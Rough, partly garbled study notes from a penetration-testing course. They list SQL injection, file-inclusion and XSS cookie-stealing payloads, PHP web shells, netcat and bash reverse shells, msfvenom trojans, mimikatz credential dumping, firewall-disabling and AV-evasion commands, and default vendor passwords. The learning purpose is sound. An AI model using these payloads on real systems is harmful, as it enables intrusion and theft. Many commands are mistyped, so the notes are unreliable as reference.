Note: The following content only records the relevant knowledge that I did not know when I was studying. The notes are sloppy and may be wrong, for reference only. I will gradually improve it!
Basically complete penetration testing framework
Day1
Chmod
Mv modify file name
The http request contains:
Request line
Request header
Request body
Get request has no request body
GET vs POST
1. Request parameters
-get
501 Method not implemented
3xx redirect
Sql injection:
1. Judge’or”
2. Comment: # or–
Joint query:
1.Order by
2.union select 1,2
3. Library database()
4. Table information_schema.tables
5. Column union select column_name, 2 from information_schema.columns where table_schema=database() and able_name=’users’#
6.Content union select user,password from users#
And ascii(mid((select user from user 0,1),1,1))>96
Boolean injection (violent injection):
And 1=1
And 1=2
Library
Table exists(select * form users)
Column exists (select column name form users)
Content and select user from users limit 1,2 / select mid(“hello word”,2,1) take one from the second line
0-9: 48 0x30
a-z: 97 0x61 select ascii(‘A’)
select ascii(‘A’)
A-Z 65 0x65
URL encoding: start with %, %20 is a space
Sleep() delay usage Select if(exist(select * frrom user),sleep(5),3)
Assignment: hub.docker.com
3, 5, 9 questions
Docker pull
Docker run
Day3:
comcat(“hell”,”word!”) splicing
Select ord(‘:’) view accii
Hex(68) Check hexadecimal
Group_concat(username,0x3a,password) one line display
-Error injection:
-floor
Select floor((rand(0)*2)
Rand(0) random number
-updatexml(1,comcat(0x7e,version(),0x7e),3) version() can be replaced with sql statement
-extractvalue in the same way
-Second order injection:
-insert into users claus(‘admin’,’pwd’)
-update usersset pwd=’123′ where name=’name’
-Universal password
-File reading and writing
-premise:
-File
-my.cnf/my.ini
-secure_file_priv=”
-Read files
-load_file (‘path’) absolute path
Etc/passwd stores user information
-Write file
-into outfile’path’
-into dumpfile’path’
-Bypass technology
-Replace or=|| and =&&
-Case
-Double writing. To combat this, you can use a loop to continue filtering until there is no
-Inline comments
-Space %20+ — ,)), %a0 %0b –=ss %2b
-Comment # +–+ —-> Close is to close the following
-POST
-sqlmap
-Basic use
1.judgment | Sqlmap -u “url” |
2.library | sqlmap -u “url” –dbs /–current-db |
3.table | sqlmap -u “url” -D db –tables |
4.Column | sqlmap -u “url” -D db -T tb –columns |
5.content | sqlmap -u “url” -D db -T tb -C col –dump |
For post type | Sqlmap -r 1.txt |
Sqlmap -r 1.txt -vv -D security –v Show detailed information, including what was entered | |
-Write tamper
-Command execution
-Multiple command symbols
;
|| (or) can be executed later when the front is false
|
&& One&
Background process
Wget
Echo
-File contains
-#include<stdio.h>
-PHP include() require()
Config.inc.php –db
Example: http://localhost:8001/vulnerabilities/fi/?page=../../../../../etc/passwd
-LFI
-No matter what the suffix is, as long as there is php code in it, it will be executed
-php pseudo protocol
-php://filter/read=convert.base64-encode/resource=1.php
<?php
System(‘whoami’)
?>
-RFI
-http://localhost:8001/vulnerabilities/fi/?page=http://192.168.38.1/1.txt remote file contains
–
-XSS (html injection)
-js statement
-document.cookie to get cookie
-Storage type
<script>document.location=’http://your address’+document.cookie</script>
<script>
document.write(“img src=’http://”+document.cookie+”‘/>”);
</script>
-File upload (capture package, send reper, modify suffix)
-A sentence
<?php @eval($_post[1]);?>
<?php@system($_get[1]);?>
<?php $_get[0]($_post[1]);?> When connecting, add 0=access after the link
Client tools:
Ant Sword
Principle; 1=@eval(base_decode($_POST[2]));$2=system(‘ls …/’);
-an examination
-Client js detection
-Suffix
-Capitalization php3,,php4,php5 ,phtml
Apache:
-.htaccess
Content: AddType application/x-httpd-php gif Meaning: parse the gif file according to php
-Types of
-image/gif
-image/png These are the contentType attributes
-image/jpeg
-File header
-GIF89a gif file header
-document content
<?php $_GET[0]($_post[1]);?> ?0=assert
Day 6
-xss
-beef software
-Blue Lotus
-File contains
-php://input
-File Upload
-00 truncated
-webgoat
-hashcat -a 0 -m 0 md5.hash dictionary path
Day7
-XXE
chown belongs to group Eg: chown www-data upload
chgrp reorganization
Reboot shutdown -r now restart
Init 0 shutdown
Day8
-jwt json format web token
-HS256 is HMAC-SHA256
Hashcat -a 0 -m 1450 (Sash id) hash file dictionary path
def hmac_base63(key,message): return base63.urlsafe_b64encode(bytes.fromhex(hmac.new(key,message,hashlib.sha256).hexdigest()))
Day9
-OWASP top 10
-Leakage of sensitive information
-transmission
-storage
-Unsafe deserialization
–
<?php
$Aaa=arry(“1″,”2”,123);
Echo serialize($aaa);
?>
result:
Book: “OWASP Testing Guide”
“Hacker Attack and Defense Technology Collection-Web Actual Combat”
website:
Vulhub.org vulnerability test range
Vulnhub.com
-frame
-Flask
–
-Multithreading
–
Day10
-cisp
Software website:
-Ip138
-licence
Safety products:
-Gateway: EW, ZPS, FS
-Terminal category: AV, patch, NAC network access control, EDR, DLP
-Audit category: log audit, database audit, VPN, fortress machine
-Monitoring category: APT, SOC, honeypot
Day 11:
-Wait for guarantee
Day12:
-php7 Trojan implementation
-A sentence
-poc proof of concept
-paylood
-Link layer CRC
-Network layer: packet, only header
-DNS resolution uses udp, server and server use tcp
-vi command
-x delete the current character
-dd delete the current line
-comm -1 1.txt 2.txt Find the same and different
-diff 1.txt 2.txt find the difference
-diff -c 1.txt 2.txt View all the information -u, after deduplication, display together
-vimdiff 1.txt 2.txt
-ps view process
-tail 1.txt
-tail -f 1.txt monitors the growth behind the file. Vim does not seem to work.
-watch -n 5 monitor -n is a few seconds to refresh
-watch -n 5 w monitor w command
-wget download file
-curl -o download file
-Environmental preparation
-windows7
-windows2008R2 https://msdn.itellyou.cn/
-linux
-ubuntu 14/metasploit2 vulnhub.com
-tool
-Swiss knife netcat
-nc -lvp 3333 open a port
-nc -l localhost 4444 link port
-n does not display nds parsing information
-v show detailed information
-e followed by the command
-file transfer
-Recipient nc -lvp 4444> 1.txt
-Sender nc ip/domain name port <1.txt
-Bind shell
-Server nc -lvo 444 -e cmd.exe
-Attacker nc -nv ip port -e cmd.exe
-Reverse shell
-attacker
-nc -lvp 444
-server
-nc -nv ip port -e cmd.exe
Day12
-collect message
-initiative
-DNS
-port/os
-nmap
-nmap -p- -Pn -n ip
-nmap -p 21 -sV -Pn -n –script==xx ip
-Nmap -O ip
-Nmap -A -F ip
-nmap -Pn -n –script=ftp-vsftpd-backdoor 192.168.174.129
-vuln scan
-debian6 amd64 .deb sudo install ./nessusxxxx.deb sudo service nessusd start
-web scan
-AWVS
-IBM appscan
-hp webinspect
-xray
-xary webscan –listen 127.0.0.1: 7777 –html-output 1.html
-Combined with bp
-Set connections under user options
-destination host:ip
-proxy host:127.0.0.1
-proxy port:7777
-passive
-whois registration information
-Webmaster’s Home
-Microstep
-google hacking
- -site:
- -filetype:File type Preceded with-sign means not to look at this type
- -inurl:
- -error:What errors have been reported
- -GHDB
- https://searchdns.netcraft.com
- Recon-ng
- -github
- Shodan/fofa/zoomeye
- https://securityheaders.com/
- https://ssslabs.com/
- https://pastebin.com/
- Theharvester Check mailbox
- Social Work Library
- Network disk/historical vulnerability information/stack overflow
- NDSRecon
-record
Megacorpone.com
-Password cracking
-dictionary
Wordpass.com
-Generate (Social Engineering Dictionary)
-cewl | cewl -d 2 -m 6 -w ./1.txt http://www.megacorpone.com |
Sudo apt install crowbar
Online cracking (remote): medusa hydra
Network service (db, ftp, ssh, rdp)
Web-burp
Http basic
Offline cracking (local) hash– which kind of hash the hashid command identifies
-windows
C:\windows\system32\SAM-Registry-system
-hash is: NT/NTLM
-Tools pwdump7/samdump2
-linux
-/etc/passwd
-/etc/shadow
-hash512 is doing encryption
-rainbow rainbow table address:
-In memory-plaintext
-mimikatz
Privilege::debug
Sekurlss::logonpasswords
-mysql
-other hash
Day14
-Implementation process
Communicate with technical dockers
-Default port number (global port) range 0-1035
Firewall/ips/icg configuration mode
-Bridge mode (transparent mode)
-In-generation management
-External management
-Routing mode (not commonly used)
-Bypass mode
Day15
-ICG management method
-Web
-Console baud rate is 9600 icgadmin/netentsec
-Ssh(13289)
-The default management address of the firewall: https://10.0.0.1
–
msfvenom
From <https://blog.csdn.net/ZmeiXuan/article/details/78061755>
Policy routing priority
-Host routing -> Direct routing -> Static routing (including dynamic routing) -> Policy routing -> ISP routing -> Default routing
Day16
-Vulnerability analysis/exploitation
-Application layer: web
-Universal owasp top10
-CMS: wordpress/discuz/joomla
-Development Framework
-php: thinkphp
-java: SSM
-Python: Flask/Django
-General framework: es
-Middleware: tomcat/weblogic
CVE/exploit-db this is a website/searchsploit
-database:
-Relational: mysql, msssql, oracle
-Non-relational: redis/mongodb
-operating system
-windows
-445
-linux
-Dirty cow (dirtycow)
-Network layer:
Variables start with $
Fuzz fuzz test
Phpinfo()
Substring(database_version(),1,1)
From
who am I
Not absolutely safe
Github: list
Kali restart network command
Sudo systemctl restart networking
Sudo systemctf restart NetworkManager
0-65536
2Mbps=0.25MBps
The default account password for all QiAnXin products:
Admin/!1ws
Write a sentence under linux, pay attention to escape
Low authority:
Right escalation:
-Local/remote
-Exploit OS vulnerabilities
-database
-third-party usage
Exploit
-.py
-.php
-.pl perl language
-.rb ruby language is generally used for msf
-.c run after gcc is compiled
-Vulnerabilities in .txt/.md webapps
-Scan the background
-dirb tool
Linux permissions
-rw-r–r– 1 This number is for directories, all directories have two subdirectories,. and ..
10 people
User group other
-: ordinary file
d: directory
l: link (shortcut)
b/c: device file
-rws r-x r-x where s means that other users execute the file with the permissions of the file owner
The octal representation is 4755, the other is displayed as t, which means tmp temporary file
There are many rights escalations on github on linux and windows
In the Passwd file:
root:x:0:0:root:/root:/bin/bash x One digit means a placeholder for the password, if not, it means no password
In the shadow file:
root:!:18470:0:99999:7:::! Indicates that you cannot log in, cannot log in, or is locked. 18470 indicates the number of days subtracted from January 1, 1970, which is the time when the password was last modified
linux firewall
Iptables
Iptables
Setenforce
View os information:
Os-release
Lsb=release
Users added under the Etc/sudoer.d file can use sudo
Find files with s permissions Sudo find / -perm -4000 2>/dec/null
touch create file
Echo “`Command`” | Backquote means to execute as a command |
DAY17
-Windows basics
Help document command/?
-system message
ver
Winver
systeminfo
-user
-Computer management: compmgmt.msc
-SAM is essentially the registry-the command is: regedit
The group policy command is: gpedit.msc
SID:
administrator 500
Guest 501
Net user View user
Net user username password change password
Net user username /active:yes activate account
See the help document for others
Add $ to the end of the username to hide the account
Net localgroup administrators view this group
-Firewall
Turn off firewall
-net stop shareacce
-netsh firewall set opmode disable
-netsh advfirewall set allprofile state off
-Open 3389
Reg add “HKLM\system\currentcontrolset\control\terminal server” /v fDenyTSConnections /t reg_dword /d 0 /f
-View port
-reg query “HKLM\system\currentcontrolset\control\terminal server\winstation\rdp-tcp” /v portnumber
After Msfvenom generates the Trojan, enter the msfconsole and use the following command: Use exploit/multi/handler
-Change environment variable command
-export
Su tom switch user
Day18
-gobuster tool
nmap escalation
git escalation
awk escalation
msf monitor exploit/mu msfvenom generation: msfevom -p payload lhost=ip -f exe -a x64 -o shell.exe
Day19
firewall
-linux turn off the firewall
-service iptables stop
-sysytem
-bash -I >& /dev//tcp/ip/port 0>&1
-powershell
-Port forwarding
-msf can do
rdesktop tool command: rdesktop ip
The first step is to generate a rebound exe through msfv and pass it to the other party
The second part, msfc turns on monitoring, and the other party runs exe
The third step, after the link, execute the remote desktop port forwarding command
The fourth part. Link your own 3389, use rdesktop command
VM Network
-Net
-bridge
-host only
Linux default proxy /etc/proxychains
Nmap scan is best to add -Pn (prohibit ping scan) for protocol reasons, such as
Day20
Msf – post
Cobalt strike – red team
aisle:
-dns/icmp
Ice scorpion West thorn agent (free agent exchange ip)
Kerbors authentication in windows domain name–golden ticket–SSO
-tgt ticket license ticket
The privilege escalation module is often used in the msf domain, search psexec
Day21
file transfer
Ftp
-filezilla/server-u
-pure-ftpd/vsftpd
Put and get
Http
Echo $webclient = New-Object System.Net.WebClient >> open a web client under wget.psl windows
Echo $url = “http://192,.168.174.128:4444/hello.txt”>>wget.psl file address under kali
Echo $file=”exploid.txt” >> The name of the file saved in wget.psl under windows
Echo $webclient.DownloadFile($url,$file) >>wget.psl download file
The premise of the following execution is to open a web service under kali
Powershell.exe -ExecutionPolicy Bypass -Nologo -Nonlnteractive -Nologo -noninteractive -noprofile -file file name or
Powershell.exe -ExecutionPolocy Bypass -File filename
Powershell.exe (new-object system.net.webclient).downloadfile
Anti-software bypass
-Signature bypass
-sandbox
Static
-PE/ELF
-IDA PRO
dynamic
-debugging
-Sandbox-Behavior-Monitor files/registries/network connections
Shellter tool, inject code into normal PE files, such as notepad.exe, and it must be a 32-bit program
Empire tool, similar to msf, written in powershell, mostly powershell modules
Permission maintenance
-windows
-shift
sethc.exe
-Image hijacking
-Remote Control Trojan
-linux
-suid
-ld_preload
Clean up traces
Metasploit3 drone penetration
The binwalk command separates whether the image is multiple files
Knock ip port
View Knockd.conf can use knock technology
View file attributes command under windows
Sttrib
Encryption under windows has EFS and
Bitlocker (encrypt hard disk)
icacls under windows is the command to change permissions
View file attributes under lsattr under linux
Intranet penetration agent cannot use vpn or frp
To be continued………….
Reviews
There are no reviews yet.